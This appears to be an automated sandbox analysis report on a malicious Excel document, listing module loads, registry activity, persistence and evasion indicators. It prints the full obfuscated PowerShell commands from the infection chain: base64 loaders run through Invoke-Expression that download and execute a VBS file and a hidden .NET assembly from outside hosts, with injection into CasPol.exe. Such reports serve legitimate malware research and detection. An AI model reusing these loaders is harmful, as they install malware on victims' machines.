                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdb source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdbhP source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdb source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdbhP source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.474546983.000000001C398000.00000004.00000020.00020000.00000000.sdmp
                  Source: 0200011080.xlsInitial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,29_2_004044A4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899C022D push eax; iretd 7_2_000007FE899C0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899C00BD pushad ; iretd 7_2_000007FE899C00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044693D push ecx; ret 29_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044DB70 push eax; ret 29_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044DB70 push eax; ret 29_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00451D54 push eax; ret 29_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0044B090 push eax; ret 30_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0044B090 push eax; ret 30_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00451D34 push eax; ret 30_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00444E71 push ecx; ret 30_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00414060 push eax; ret 31_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00414060 push eax; ret 31_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00414039 push ecx; ret 31_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_004164EB push 0000006Ah; retf 31_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00416553 push 0000006Ah; retf 31_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00416555 push 0000006Ah; retf 31_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_004567E0 push eax; ret 32_2_004567FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0045B9DD push esi; ret 32_2_0045B9E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00463EF3 push ds; retf 32_2_00463EEC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00455EAF push ecx; ret 32_2_00455EC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00433FF6 push ecx; ret 32_2_00434009

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00406128 ShellExecuteW,URLDownloadToFileW,32_2_00406128
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,32_2_00419BC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,30_2_004047CB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Process information set: NOOPENFILEERRORBOX
                  Source: 0200011080.xls  Stream path 'MBD001F7C6B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
                  Source: 0200011080.xls  Stream path 'Workbook' entropy: 7.99839989777 (max. 8.0)
                  Source: CC430000.0.dr  Stream path 'MBD001F7C6B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
                  Source: CC430000.0.dr  Stream path 'Workbook' entropy: 7.99845069196 (max. 8.0)

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Code function: 32_2_0040E54F Sleep,ExitProcess  32_2_0040E54F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle  29_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle  32_2_004198C2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 600000
                  Source: C:\Windows\System32\wscript.exe  Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 8892
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1040
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5121
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1693
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2625
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2546
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1581
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5018
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  API coverage: 6.2 %
                  Source: C:\Windows\System32\mshta.exe TID: 3608  Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784  Thread sleep count: 8892 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780  Thread sleep count: 1040 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3824  Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3828  Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076  Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080  Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080  Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\mshta.exe TID: 3096Thread sleep time: -540000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 2625 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 2546 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1332Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2728Thread sleep count: 1581 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep count: 5018 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3112Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -2400000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1924Thread sleep time: -48000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3440Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3648Thread sleep time: -120000s >= -30000s
